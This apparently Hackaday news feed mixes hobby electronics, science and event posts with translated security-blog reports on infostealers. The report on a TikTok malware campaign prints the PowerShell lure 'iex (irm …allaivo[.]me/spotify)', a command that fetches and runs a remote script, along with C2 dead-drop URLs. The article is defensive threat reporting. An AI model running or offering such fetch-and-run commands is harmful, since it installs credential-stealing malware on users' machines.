Hackaday Supercon 2025 Call For Participation: We Want You!
We’re tremendously excited to be able to announce that the Hackaday Supercon is on for 2025, and will be taking place October 31st through November 2nd in Pasadena, California.
Supercon is about bringing the Hackaday community together to share our great ideas, big and small. So get to brainstorming, because we’d like to hear what you’ve been up to! Like last year, we’ll be featuring both longer and shorter talks, and hope to get a great mix of both first-time presenters and Hackaday luminaries. If you know someone you think should give a talk, point them here.
The Call for Participation form is online now, and you’ve got until July 3rd to get yourself signed up.
Honestly, the people that Supercon brings together are reason enough to attend, but then you throw in the talks, the badge-hacking, the food, and the miscellaneous shenanigans … it’s an event you really don’t want to miss. And as always, presenters get in for free, get their moment in the sun, and get warm vibes from the Hackaday audience. Get yourself signed up now!
We’ll have more news forthcoming in the next few weeks, including the start of ticket sales, so be sure to keep your eyes on Hackaday.
Now KDE Users Will Get Easy Virtual Machine Management, Too
If you work with virtual machines, perhaps to spin up a clean OS install for testing, historically you have either bitten the bullet and used one of the commercial options, or spent time getting your hands dirty with something open source. Over recent years that has changed, with the arrival of open source graphical applications for effortless VM usage. We’ve used GNOME Boxes here to make our lives a lot easier. Now KDE are also joining the party with Karton, a project which will deliver what looks very similar to Boxes in the KDE desktop.
The news comes in a post from Derek Lin, which shows us what work has already been done as well as a roadmap for what’s to come. At the moment it’s in no way production ready and it only works with QEMU, but it can generate new VMs, run them, and capture their screens to a desktop window. Having no wish to join in any Linux desktop holy wars, we look forward to seeing this piece of software progress; as it’s a Google Summer of Code project, we hope there will be plenty more to see shortly.
Still using the commercial option? You can move to open source too!
A Brief History of Fuel Cells
If we asked you to think of a device that converts a chemical reaction into electricity, you’d probably say we were thinking of a battery. That’s true, but there is another device that does this that is both very similar and very different from a battery: the fuel cell.
In a very simple way, you can think of a fuel cell as a battery that consumes the chemicals it uses and allows you to replace those chemicals so that, as long as you have fuel, you can have electricity. However, the truth is a little more complicated than that. Batteries are energy storage devices. They run out when the energy stored in the chemicals runs out. In fact, many batteries can take electricity and reverse the chemical reaction, in effect recharging them. Fuel cells react chemicals to produce electricity. No fuel, no electricity.
Superficially, the two devices seem very similar. Like batteries, fuel cells have an anode and a cathode. They also have an electrolyte, but its purpose isn’t the same as in a conventional battery. Typically, a catalyst causes fuel to oxidize, creating positively charged ions and electrons. These ions move from the anode to the cathode, and the electrons move from the anode, through an external circuit, and then to the cathode, producing an electric current. Many fuel cells also generate potentially useful byproducts like water. NASA has the animation below that shows how one type of cell works.
youtube.com/embed/V3ChCroWttY?…
History
Sir William Grove seems to have made the first fuel cell in 1838, publishing in The London and Edinburgh Philosophical Magazine and Journal of Science. His fuel cell used dilute acid and copper sulphate, along with sheet metal and porcelain. Today’s phosphoric acid fuel cell is similar to Grove’s design.
The Bacon fuel cell is due to Francis Thomas Bacon and uses an alkaline electrolyte. Modern versions of this are in use today by NASA and others. Although Bacon’s fuel cell could produce 5 kW, it was General Electric in 1955 that started creating larger units. GE chemists developed an ion exchange membrane that included a platinum catalyst. Named after its developers, the “Grubb-Niedrach” fuel cell flew in Gemini space capsules. By 1959, a fuel cell tractor prototype was running, as well as a welding machine powered by a Bacon cell.
One of the reasons spacecraft often use fuel cells is that many cells take hydrogen and oxygen as fuel and put out electricity and water. The spacecraft already carries tanks of both gases, and the crew can always use the water.
Types of Fuel Cells
Not all fuel cells use the same fuel or produce the same byproducts. At the anode, a catalyst ionizes the fuel, which produces a positive ion and a free electron. The electrolyte, often a membrane, can pass ions, but not the electrons. That way, the ions move towards the cathode, but the electrons have to find another way — through the load — to get to the cathode. When they meet again at the cathode, a reaction with the oxidizer and a catalyst produces the byproduct: hydrogen and oxygen form water.
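For the common hydrogen case, the half-reactions are standard textbook chemistry, shown here for reference:

```latex
\begin{aligned}
\text{Anode:}   &\quad \mathrm{H_2 \rightarrow 2\,H^+ + 2\,e^-} \\
\text{Cathode:} &\quad \mathrm{\tfrac{1}{2}\,O_2 + 2\,H^+ + 2\,e^- \rightarrow H_2O} \\
\text{Overall:} &\quad \mathrm{H_2 + \tfrac{1}{2}\,O_2 \rightarrow H_2O}, \qquad E^\circ \approx 1.23\ \mathrm{V}
\end{aligned}
```

That 1.23 V is a theoretical ceiling; a real cell delivers less under load, which is why practical systems stack many cells in series.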
Most common cells use hydrogen and oxygen with an anode catalyst of platinum and a cathode catalyst of nickel. The voltage output per cell is often less than a volt. However, some fuel cells use hydrocarbons. Diesel, methanol, and other hydrocarbons can produce electricity and carbon dioxide as a byproduct, along with water. You can even use some unusual organic inputs, although to be fair, those are microbial fuel cells.
Common types include:
- Alkaline – The Bacon cell was a fixture in space capsules, using carbon electrodes, a catalyst, and a hydroxide electrolyte.
- Solid acid – These use a solid acid material as electrolyte. The material is heated to increase conductivity.
- Phosphoric acid – Another acid-based technology, one that operates at higher temperatures.
- Molten carbonate – These work at high temperatures using lithium potassium carbonate as an electrolyte.
- Solid oxide – Another high-temperature design, this one using zirconia ceramic as the electrolyte.
In addition to the underlying technology, you can also classify fuel cells as stationary — typically producing a lot of power for consumption by some power grid — or mobile.
Using fuel cells in stationary applications is attractive partly because they have no moving parts. However, you need a way to fuel them and — if you want efficiency — a way to harness the waste heat produced. It is possible, for example, to use solar power to turn water into gas and then use that gas to feed a fuel cell. The heat can be used directly or converted to electricity in a more conventional way.
Space
Fuel cells have a long history in space. You can see how alkaline Bacon cells were used in early spacecraft in the video below.
youtube.com/embed/OouXKyroV4w?…
Apollo (left) and Shuttle (right) fuel cells (from a NASA briefing)
Very early fuel cells — starting with Gemini in 1962 — used a proton exchange membrane. In 1967, NASA started using Nafion from DuPont, which was an improvement over the older membranes.
Alkaline cells, however, had vastly better power density, and from Apollo on these cells, using a potassium hydroxide electrolyte, were standard issue.
Even the Shuttle had fuel cells. Russian spacecraft also had fuel cells, starting with a liquid oxygen-hydrogen cell used on the Soviet Lunar Orbital Spacecraft (LOK).
Each of the shuttle’s fuel cell power plants measured 14 x 15 x 45 inches and weighed 260 pounds. They were installed under the payload bay, just aft of the crew compartment. They drew cryogenic gases from nearby tanks and could provide 12 kW continuously, and up to 16 kW at peak. However, they typically ran at about 50% capacity. Each orbiter power plant contained 96 individual cells connected to achieve a 28-volt output.
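As a quick sanity check on those figures, 12 kW of continuous output on a 28-volt bus works out to a little over 400 amps per power plant:

```latex
I = \frac{P}{V} \approx \frac{12\,000\ \mathrm{W}}{28\ \mathrm{V}} \approx 430\ \mathrm{A}
```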
Going Mobile
There have been attempts to make fuel cell cars, but the difficulty of producing, storing, and delivering hydrogen has led to resistance. The Toyota Mirai, for example, costs $57,000, yet owners have sued because they couldn’t obtain hydrogen. Some buses use fuel cells, as do a small number of trains (including the one mentioned in the video below).
youtube.com/embed/0d0h42IZlWU?…
Surprisingly, there is a market for forklifts using fuel cells. The clean output makes them ideal for indoor operation. Batteries? They take longer to charge and don’t work well in the cold. Fuel cells don’t mind the cold, and you can top them off in three minutes.
There have been attempts to put fuel cells into any vehicle you can imagine. Airplanes, motorcycles, and boats sporting fuel cells have all made the rounds.
Can You DIY?
We have seen a few fuel cell projects, but they all seem to vanish over time. In theory, it shouldn’t be that hard, unless you demand commercial efficiency. However, it can be done, as you can see in the video below. If you make a fuel cell, be sure to send us a tip so we can spread the word.
youtube.com/embed/NE6dxzDeWbI?…
Featured image: “SEM micrograph of an MEA cross section” by [Xi Yin]
Followed a Nice Tutorial on TikTok Without Paying Attention? Congratulations, You’ve Got Yourself Some Malware!
In a worrying sign of how cybercriminal tactics are evolving, threat actors are now exploiting TikTok’s popularity as a distribution channel for advanced information-stealing malware. The latest campaign in circulation focuses on spreading the Vidar and StealC infostealers, tricking users into running malicious PowerShell commands under the pretext of activating legitimate software or unlocking premium features in applications such as Windows, Microsoft Office, CapCut, and Spotify.
Unlike traditional methods, such as compromised websites or phishing emails, this attack vector relies entirely on social engineering delivered through video. The cybercriminals produce anonymous videos, often generated with AI tools, that walk victims step by step through unwittingly installing the malware on their own devices.
This approach is particularly insidious because it leaves no malicious code on the platform itself for security solutions to detect, and all of the actionable content is delivered visually and audibly. Trend Micro researchers have identified several TikTok accounts involved in this campaign, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771.
Their investigation revealed that some videos have been remarkably successful: one in particular racked up more than 20,000 likes, 100 comments, and roughly 500,000 views. This wide reach demonstrates the campaign’s potential impact and underscores how TikTok’s algorithmic amplification can spread harmful content.
The consequences for victims are serious, since these infostealers can siphon off sensitive data, steal credentials, and potentially compromise corporate systems. Once installed, the malware establishes communication with command-and-control servers, allowing attackers to harvest valuable information from compromised devices.
Infection Mechanism and Technical Analysis
The infection chain begins when users follow the video instructions to open PowerShell (pressing Windows+R and typing “powershell”) and then run a command similar to: iex (irm https://allaivo[.]me/spotify). This innocuous-looking command downloads and executes a remote script (SHA256: b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886) that kicks off the infection process.
Once executed, the script creates hidden directories in the user’s APPDATA and LOCALAPPDATA folders, then adds those paths to the Windows Defender exclusion list: a sophisticated evasion technique that helps the malware avoid detection. The malware then proceeds to download additional payloads, including the Vidar and StealC infostealers.
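Since the script’s key evasion step is adding its working folders to the Defender exclusion list, checking that list is a quick way to triage a machine. The sketch below is purely illustrative and is not taken from the campaign or from Trend Micro’s report: it enumerates locally configured path exclusions from the registry key where they normally appear, and it assumes an elevated prompt on a system where exclusions are not managed by policy.

```python
# List Windows Defender path exclusions straight from the registry.
# Illustrative triage helper only; requires an elevated prompt, and
# policy-managed exclusions may live under a different key.
import winreg

KEY_PATH = r"SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths"

def list_path_exclusions():
    exclusions = []
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, KEY_PATH) as key:
            index = 0
            while True:
                try:
                    # Each excluded path is stored as a value *name* under this key.
                    name, _value, _type = winreg.EnumValue(key, index)
                    exclusions.append(name)
                    index += 1
                except OSError:
                    break  # no more values
    except OSError:
        pass  # key absent or access denied
    return exclusions

if __name__ == "__main__":
    for path in list_path_exclusions():
        print("Excluded:", path)
```

Unexpected entries pointing into APPDATA or LOCALAPPDATA are worth a closer look.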
These malware variants are particularly dangerous because they target sensitive information, including saved passwords, cryptocurrency wallets, and authentication cookies. After installation, the malware connects to various command-and-control servers, including legitimate services abused for the purpose.
Vidar, for example, uses Steam profiles (hxxps://steamcommunity[.]com/profiles/76561199846773220) and Telegram channels (hxxps://t[.]me/v00rd) as “dead drop resolvers” to hide its actual C&C infrastructure, a technique that makes tracking and disruption more difficult. What makes this campaign particularly effective is the way it blends social engineering with technical exploitation.
By presenting themselves as helpful tutorials for unlocking premium features in popular software, the videos build trust with viewers, who then willingly run the very commands that compromise their systems. This represents a significant evolution in social-media-based attacks and shows how threat actors keep adapting their tactics to exploit user behavior and evade traditional security controls.
The article “Followed a Nice Tutorial on TikTok Without Paying Attention? Congratulations, You’ve Got Yourself Some Malware!” originally appeared on il blog della sicurezza informatica.
Trashed Sound System Lives to Rock another Day
Plenty of consumer goods, from passenger vehicles to toys to electronics, get tossed out prematurely for all kinds of reasons. Repairable damage, market trends, planned obsolescence, and bad design can all lead to an early sunset on something that might still have some useful life in it. This was certainly the case for a sound system that [Bill] found — despite a set of good speakers, the poor design of the hardware combined with some damage was enough for the owner to toss it. But [Bill] took up the challenge to get it back in working order again.
Inside the DIY control unit.
The main problem with this unit is that of design. It relies on a remote control to turn it on and operate everything, and if that breaks or is lost, the entire unit won’t even power on. Tracing the remote back to the control board reveals a 15-pin connector, and some other audio sleuths online have a few ways of using this port to control the system without the remote.
[Bill] found a few mistakes that needed to be corrected, and was eventually able to get an ESP8266 (and later an ESP32) to control the unit, thanks largely to the fact that it communicates using a slightly modified I2C protocol.
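We haven’t seen [Bill]’s exact code, but the general shape of driving such a bus from an ESP32 is straightforward. The MicroPython sketch below is only an illustration: the pins, the 0x40 device address, and the two-byte “power on” payload are all placeholders rather than values from this build, and a “slightly modified” I2C bus may well need bit-banging instead of the stock peripheral.

```python
# MicroPython (ESP32) sketch: send a hypothetical "power on" command over I2C.
# All pins, addresses, and payload bytes below are placeholders, not values
# taken from [Bill]'s project.
from machine import Pin, SoftI2C

i2c = SoftI2C(scl=Pin(22), sda=Pin(21), freq=100000)  # placeholder pins

AMP_ADDR = 0x40                  # hypothetical 7-bit address of the control board
POWER_ON = bytes([0x01, 0x01])   # hypothetical register/value pair

def power_on():
    # Scan first so a wiring mistake fails loudly instead of silently.
    if AMP_ADDR not in i2c.scan():
        raise RuntimeError("control board not answering on the bus")
    i2c.writeto(AMP_ADDR, POWER_ON)

power_on()
```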
There were a few pieces of physical damage to correct, too. First, the AC power cable had been cut off, which was simple enough to replace, but [Bill] also found that a power connector inside the unit was loose as well. With that taken care of, he has a perfectly functional and remarkably inexpensive sound system ready for movies or music. There are some other options available for getting a set of speakers blasting tunes again, like building the amplifier for them from scratch.
Roller Gearbox Allows For New Angles in Robotics
DIY mechatronics always has some unique challenges when relying on simple tools. 3D printing enables some great abilities but high precision gearboxes are still a difficult problem for many. Answering this problem, [Sergei Mishin] has developed a very interesting gearbox solution based on a research paper looking into simple rollers instead of traditional gears. The unique attributes of the design come from the ability to have a compact angled gearbox similar to a bevel gearbox.
Multiple rollers rest on a simple shaft, allowing each roller to rotate independently. This is important because a circular crown gear used for angled transmission creates different rotation speeds across its face. In [Sergei]’s testing, he found that his example gearbox could withstand 9 Nm, with the adapter breaking before the gearbox did, which shows decent strength.
Of course, how does this differ from a normal bevel gear setup or other 3D printed gearboxes? While 3D printed gears offer great flexibility and are simple to make, plastic-on-plastic meshing is generally very difficult to make both precise and long-lasting. [Sergei]’s design allows a highly complex crown gear to take advantage of 3D printing while relying on simple rollers for improved strength and precision.
While claims of “zero backlash” may be a bit far-fetched, this design still shows great potential for some cool projects. Unique gearboxes are somewhat common here at Hackaday, such as this wobbly pericyclic gearbox, but they almost always have a fun spin!
youtube.com/embed/VXcuryyRGbo?…
Thanks to [M] for the tip!
Lumma Stealer: The Start of a Takedown, or Just a Tactical Move?
In recent hours there has been a great deal of media buzz about the “takedown” of the infrastructure behind the well-known malware-as-a-service Lumma Stealer, a joint operation led by the FBI, Europol, CISA, and private partners such as Microsoft. The action hit the malware’s distribution systems and rental channels, aiming to disrupt one of the most active cybercriminal threats of recent years.
However, as the BleepingComputer article and independent verification also make clear, it is important to distinguish between the operation’s tactical success and its actual ability to neutralize Lumma Stealer’s infrastructure.
According to official statements, more than 2,300 domains tied to Lumma were seized and some platforms for selling and renting the malware were shut down. Microsoft obtained a court order to disable infrastructure managed through fraudulent registrars. Technical analysis, however, suggests that part of the malware’s network is still operational.
Tests on active samples show that Lumma is still able to communicate with C2 servers that were not hit. Some underground operators have confirmed temporary outages that were quickly resolved. This shows that, while it was an important act of disruption, the operation did not deal a definitive blow to the malware’s operational chain.
A panel still active vs. one that has been seized
The Challenge of Flexible Infrastructure
Lumma, like other infostealers, is designed to be resilient. Its infrastructure components are rotated frequently, its C2 servers change every day, and its control panels are distributed and easy to replicate. This makes it difficult for the authorities to inflict permanent damage through domain seizures alone. The infrastructure can reorganize itself quickly, thanks to backups and dormant domains ready for activation.
Pressure on the Affiliates, Too
One interesting element is the alleged seizure of Lumma’s official Telegram channel, or at least its compromise by the authorities. After an initial message in Russian, a second message in English appeared, attributed directly to the Federal Bureau of Investigation and reinforced by a symbolic image showing a bird behind bars.
The message, addressed to the service’s subscribers, ironically thanks the members of the Lumma team for the “hospitality” granted in the channel, while accusing the administrators of failing to protect their own customers.
It also offers the option of contacting the FBI directly via Telegram, Signal, or email, in an apparent invitation to cooperate or voluntarily surrender. The message closes with a deliberately ambiguous line: “if you don’t contact us, don’t worry: we will contact you.”
If authentic, this maneuver goes beyond a simple technical seizure: it is a form of psychological pressure aimed at eroding end users’ trust in the service itself, discouraging future activity and creating a climate of panic or distrust within the criminal ecosystem.
The Strategic Role of Private Actors
One of the most significant aspects of this operation is the direct involvement of private companies in the intelligence, seizure, and technical disabling of Lumma Stealer’s infrastructure. Microsoft played a central role in obtaining a court order to seize domains managed through fraudulent registrars.
ESET contributed proactive monitoring and analysis of the malware components, providing key information on how Lumma operates and supporting the attribution of infrastructure elements. CleanDNS helped block and de-register the malicious domains, while Cloudflare contributed threat intelligence data and tools aimed at countering the evasion techniques Lumma uses to mask its C2 traffic.
This synergy between the public and private sectors was a fundamental lever in carrying out a coordinated operation on a global scale, demonstrating how the effectiveness of a cyber operation today depends more and more on cross-cutting collaboration between institutional actors and the security industry.
Are Infostealers Overtaking Ransomware?
This operation, while not decisive, marks an important change of direction: a phenomenon in explosive growth is finally being targeted systematically. Stealers like Lumma are becoming the real economic engine of modern cybercrime.
The mass sale of exfiltrated logs, credentials, cookies, and wallets happens automatically on underground marketplaces and Telegram, generating steady profits even without direct extortion.
The partial takedown of Lumma Stealer is a concrete result, but not yet a conclusive one. The infrastructure has taken a hit, but it has not been completely dismantled. The malware continues to circulate, albeit less efficiently.
It is therefore essential to watch the authorities’ next moves: only sustained operations and a strategic change of pace will have a lasting impact on a threat that has already evolved beyond the ransomware model.
Sources:
- bleepingcomputer.com/news/secu…
- cisa.gov/news-events/cybersecu…
- app.any.run/tasks/fb014a66-d52…
- welivesecurity.com/en/eset-res…
- cleandns.com/battling-lumma-st…
- bitsight.com/blog/lumma-steale…
- cloudflare.com/it-it/threat-in…
- Observations and discussions published on X by independent security analysts (May 2025)
The article “Lumma Stealer: The Start of a Takedown, or Just a Tactical Move?” originally appeared on il blog della sicurezza informatica.
Jettison Sails for Electric Propulsion
Although there are some ferries and commercial boats that use a multi-hull design, the most recognizable catamarans by far are those used for sailing. They have a number of advantages over monohull boats including higher stability, shallower draft, more deck space, and often less drag. Of course, these advantages aren’t exclusive to sailboats, and plenty of motorized recreational craft are starting to take advantage of this style as well. It’s also fairly straightforward to remove the sails and add powered locomotion, as this electric catamaran demonstrates.
Not only is this catamaran electric, but it’s solar powered as well. With the mast removed, the solar panels can be fitted to a canopy which provides 600 watts of power as well as shade to both passengers. The solar panels charge two 12V 100ah LifePo4 batteries and run a pair of motors. That’s another benefit of using a sailing cat as an electric boat platform: the rudders can be removed and a pair of motors installed without any additional drilling in the hulls, and the boat can be steered with differential thrust, although this boat also makes allowances for pointing the motors in different directions as well.
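As a rough back-of-the-envelope check (assuming the two packs simply add together and ignoring charging losses), that works out to a couple of kilowatt-hours of storage and a solar recharge measured in hours rather than days:

```latex
E_{\text{batt}} = 2 \times 12\ \mathrm{V} \times 100\ \mathrm{Ah} = 2.4\ \mathrm{kWh},
\qquad
t_{\text{recharge}} \approx \frac{2.4\ \mathrm{kWh}}{0.6\ \mathrm{kW}} = 4\ \mathrm{h}\ \text{(full sun)}
```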
In addition to a highly polished electric drivetrain, the former sailboat adds some creature comforts as well, replacing the trampoline with a pair of seats and adding an electric hoist to raise and lower the canopy. As energy density goes up and costs come down for solar panels, more and more watercraft are taking advantage of this style of propulsion as well. In the past we’ve seen solar kayaks, solar houseboats, and custom-built catamarans (instead of conversions) as well.
youtube.com/embed/1DyONG2oHPg?…
Wisconsin and Michigan Without Phone Service: Cellcom Was Attacked. No Calls for a Week
Subscribers of the telecom operator Cellcom, which serves users in Wisconsin and Upper Michigan (USA), were left without service for almost a week: they could neither make calls nor send SMS messages. Only days after the incident began did the company admit what had already been suspected: a cyberattack had caused the massive outage.
Initially, the operator described the incident as a technical malfunction, assuring customers that data service, iMessage, RCS messaging, and 911 emergency calls continued to work. However, users grew increasingly frustrated at the lack of service and the inability to port a number to another carrier: Cellcom’s internal systems simply weren’t working.
Now the company’s CEO, Brigid Riordan, has officially confirmed that this is a “cyber incident.”
In a letter to subscribers, she stressed that the company had response protocols in place and that the team had followed those plans from the start. The measures taken include bringing in outside cybersecurity experts, notifying the FBI and Wisconsin authorities, and working around the clock to restore systems.
The attack affected only an isolated segment of the infrastructure, one unrelated to the storage of personal data. So far there has been no evidence of any leak of information, including subscribers’ names, addresses, or financial data.
Some services are now gradually being restored. On May 19, users were able to exchange SMS messages and make calls within the Cellcom network. The timeline for a complete recovery, however, remains uncertain. On its updates page, the company said it expects to restore all services by the end of the week, but it could not provide an exact date.
For subscribers whose service is slow to return, the company suggests a simple way to try to restore it: turn on airplane mode for 10 seconds, then turn it off. If the problem persists, restart the device.
Despite growing criticism of its slow response, Cellcom has begun to be more open about the situation: in addition to the letter, the CEO also recorded a video message explaining the current state of affairs and the progress of the recovery. The company has made no statement about a possible ransomware attack.
The situation shows just how critical dependence on the stability of digital infrastructure can become, even at a regional level. At the same time, Cellcom stresses that it had prepared in advance for incidents like this, yet the consequences were still felt by tens of thousands of users.
The article “Wisconsin and Michigan Without Phone Service: Cellcom Was Attacked. No Calls for a Week” originally appeared on il blog della sicurezza informatica.
Gene Editing Spiders to Produce Red Fluorescent Silk
Regular vs gene-edited spider silk with a fluorescent gene added. (Credit: Santiago-Rivera et al. 2025, Angewandte Chemie)
Continuing the scientific theme of adding fluorescent proteins to everything that moves, this time spiders found themselves at the pointy end of the CRISPR-Cas9 injection needle. In a study by researchers at the University of Bayreuth, common house spiders (Parasteatoda tepidariorum) had a gene inserted for a red fluorescent protein in addition to having an existing gene for eye development disabled. This was the first time that spiders have been subjected to this kind of gene-editing study, mostly due to how fiddly they are to handle as well as their genome duplication characteristics.
In the research paper in Angewandte Chemie the methods and results are detailed, with the knock-out approach of the sine oculis (C1) gene being tried first as a proof of concept. The CRISPR solution was injected into the ovaries of female spiders, whose offspring then carried the mutation. With clear deficiencies in eye development observable in this offspring, the researchers moved on to adding the red fluorescent protein gene with another CRISPR solution, which targets the major ampullate gland where the silk is produced.
Ultimately, this research serves to demonstrate that it is possible to not only study spiders in more depth these days using tools like CRISPR-Cas9, but also that it is possible to customize and study spider silk production.
High Voltage for Extreme Ozone
Don’t you hate it when, while building your DIY X-ray machine, you make an uncomfortable amount of ozone gas? No? Well [Hyperspace Pirate] did, which gave him an interesting idea. While creating a high voltage supply for his very own X-ray machine, the high voltage corona discharge produced a very large amount of ozone. Normally, however, ozone is produced using lower voltages, smaller gaps, and large surface areas. Naturally, this led [Hyperspace Pirate] to investigate whether a higher voltage method is effective at producing ozone.
Using a custom 150kV converter, [Hyperspace Pirate] was able to test the large gap method compared to the lower voltage method (dielectric barrier discharge). An ammonia reaction with the ozone allowed our space buccaneer to test which method was able to produce more ozone, as well as some variations of the designs.
Experimental Setup with ozone production in the left jar and nitrate in the right.
Large 150 kV gaps proved slightly effective, but with no large gains, at least not compared to the dielectric barrier method. As for the dielectric itself, glass leads straight to holes and HTPE gets cooked, but in the end he was able to produce a somewhat sizable amount of ammonium nitrate. The best design included two test tubes filled with baking soda and their respective electrodes. Of course, this comes with the addition of a very effective ozone generator.
While this project is very thorough, [Hyperspace Pirate] himself admits the extreme dangers of high ozone levels, which got close enough to LD50 levels to be worrying throughout his room. That goes for playing with high voltage in general, kids! At the end of the day, even with the potential asthma risk, this is a pretty neat project that should probably be left to [Hyperspace Pirate]. If you want to check out other projects from a distance, you should look over at this 20 kW microwave that can cook even the most rushed meals!
youtube.com/embed/HZYWpZYuRKc?…
Thanks to [Mahdi Naghavi] for the Tip!
FLOSS Weekly Episode 833: Up and Over
This week, Jonathan Bennett and Jeff Massie chat with Tom Herbert about eBPF, really fast networking, what the future looks like for high performance computing and the Linux Kernel, and more!
youtube.com/embed/v9P5em2r0fo?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/05/21/floss-…
Field Testing An Antenna, Using A Field
The ARRL used to have a requirement that any antenna advertised in their publications had to have real-world measurements accompanying it, to back up any claims of extravagant performance. I’m told that nowadays they will accept computer simulations instead, but it remains true that knowing what your antenna does rather than just thinking you know what it does gives you an advantage. I was reminded of this by a recent write-up in which the performance of a mylar sheet as a ground plane was tested at full power with a field strength meter, because about a decade ago I set out to characterise an antenna using real-world measurements and readily available equipment. I was in a sense field testing it, so of course the first step of the process was to find a field. A real one, with cows.
Walking Round And Round A Field In The Name Of Science
A very low-tech way to make field recordings.
The process I was intending to follow was simple enough. Set up the antenna in the middle of the field, have it transmit some RF, and measure the signal strength at points along a series of radial lines away from it. I’d end up with a spreadsheet, from which I could make a radial plot that would, I hoped, give me a diagram showing its performance. It’s a rough and ready methodology, but given a field and a sunny afternoon, not one that should be too difficult.
I was more interested in the process than the antenna, so I picked up my trusty HB9CV two-element 144MHz antenna that I’ve stood and pointed at the ISS many times to catch SSTV transmissions. It’s made from two phased half-wave radiators, but it can be seen as something similar to a two-element Yagi array. I ran a long mains lead out to a plastic garden table with the HB9CV attached, and set up a Raspberry Pi whose clock would produce the RF.
My receiver would be an Android tablet with an RTL-SDR receiver. That’s pretty sensitive for this purpose, so my transmitter would have to be extremely low powered. Ideally I would want no significant RF to make it beyond the boundary of the field, so I gave the Pi a resistive attenuator network designed to give an output of around 0.03 mW, or 30 μW. A quick bit of code to send my callsign as CW periodically to satisfy my licence conditions, and I was off with the tablet and a pen and paper. Walking round the field in a polar grid wasn’t as easy as it might seem, but I had a very long tape measure to help me.
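For the curious, the keying side of that “quick bit of code” amounts to something like the sketch below. The carrier generation itself (the Pi’s clock output, in this case) is stubbed out as key_down()/key_up() placeholders, and the callsign is a stand-in; only the Morse timing is shown.

```python
# Rough sketch: key an RF carrier on and off in Morse to send a callsign.
# How the carrier is produced is hardware-specific and stubbed out here.
import time

MORSE = {"A": ".-", "B": "-...", "C": "-.-.", "D": "-..", "E": ".", "F": "..-.",
         "G": "--.", "H": "....", "I": "..", "J": ".---", "K": "-.-", "L": ".-..",
         "M": "--", "N": "-.", "O": "---", "P": ".--.", "Q": "--.-", "R": ".-.",
         "S": "...", "T": "-", "U": "..-", "V": "...-", "W": ".--", "X": "-..-",
         "Y": "-.--", "Z": "--..", "0": "-----", "1": ".----", "2": "..---",
         "3": "...--", "4": "....-", "5": ".....", "6": "-....", "7": "--...",
         "8": "---..", "9": "----."}

DIT = 0.08  # seconds per dit, roughly 15 WPM

def key_down():  # placeholder: enable the carrier (e.g. start the GPIO clock)
    pass

def key_up():    # placeholder: disable the carrier
    pass

def send(text):
    for ch in text.upper():
        if ch == " ":
            time.sleep(7 * DIT)          # word gap
            continue
        for symbol in MORSE.get(ch, ""):
            key_down()
            time.sleep(DIT if symbol == "." else 3 * DIT)
            key_up()
            time.sleep(DIT)              # gap between elements
        time.sleep(3 * DIT)              # approximate gap between letters

while True:
    send("MYCALL")   # replace with your own callsign
    time.sleep(30)   # idle between identifications
```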
A Lot Of Work To Tell Me What I Already Knew
And lo! for I have proven an HB9CV to be directional!
I ended up with a page of figures, and then a spreadsheet which I’m amused to still find in the depths of my project folder. It contains a table of angles of incidence to the antenna versus metres from the antenna, and the data points are the figure in (uncalibrated) mV that the SDR gave me for the carrier at that point. The resulting polar plot shows the performance of the antenna at each angle, and unsurprisingly I proved to myself that a HB9CV is indeed a directional antenna.
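Turning that kind of table into a pattern takes only a few lines of Python; the column names below are just an assumption about how such a spreadsheet might be exported to CSV.

```python
# Minimal sketch: one matplotlib polar trace per measurement radius.
# Assumed CSV columns: angle_deg, distance_m, level_mv
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd

df = pd.read_csv("field_test.csv")

fig = plt.figure()
ax = fig.add_subplot(projection="polar")
for dist, group in df.groupby("distance_m"):
    group = group.sort_values("angle_deg")
    ax.plot(np.radians(group["angle_deg"]), group["level_mv"], label=f"{dist} m")
ax.set_title("HB9CV pattern, uncalibrated mV vs. bearing")
ax.legend()
plt.show()
```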
My experiment was in itself not of much use other than to prove to myself I could characterise an antenna with extremely basic equipment. But then again it’s possible that in times past this might have been a much more difficult task, so knowing I can do it at all is an interesting conclusion.
A New Mac Plus Motherboard, No Special Chips Required
The Macintosh Plus was Apple’s third take on the all-in-one Mac, and for its time it was a veritable powerhouse. If you don’t have one here in 2025 there are a variety of ways to emulate it, but should you wish for something closer to the silicon there’s now [max1zzz]’s all-new Mac Plus motherboard in a mini-ITX form factor to look forward to.
As with other retrocomputing communities, the classic Mac world has seen quite a few projects replacing custom parts with modern equivalents. Thus this board has reverse-engineered Apple PALs, a replacement for the Sony sound chip, an ATtiny-based take on the Mac real-time clock, and a Pi Pico that does VGA conversion. It’s all surface mount save for the connectors and the 68000, purely because a socketed processor allows for one of the gold-and-ceramic packages to be used. The memory is soldered, but with 4 megabytes, this is well-specced for a Mac Plus.
At the moment it’s still in the prototype spin phase, but plenty of work is being done and it shows meaningful progress towards an eventual release to the world. We are impressed, and look forward to the modern takes on a Mac Plus which will inevitably come from it. While you’re waiting, amuse yourself with a lower-spec take on an early Mac.
Thanks [DosFox] for the tip.
Big Chemistry: Fuel Ethanol
If legend is to be believed, three disparate social forces in early 20th-century America – the temperance movement, the rise of car culture, and the Scots-Irish culture of the South – collided with unexpected results. The temperance movement managed to get Prohibition written into the Constitution, which rankled the rebellious spirit of the descendants of the Scots-Irish who settled the South. In response, some of them took to the backwoods with stills and sacks of corn, creating moonshine by the barrel for personal use and profit. And to avoid the consequences of this, they used their mechanical ingenuity to modify their Fords, Chevrolets, and Dodges to provide the speed needed to outrun the law.
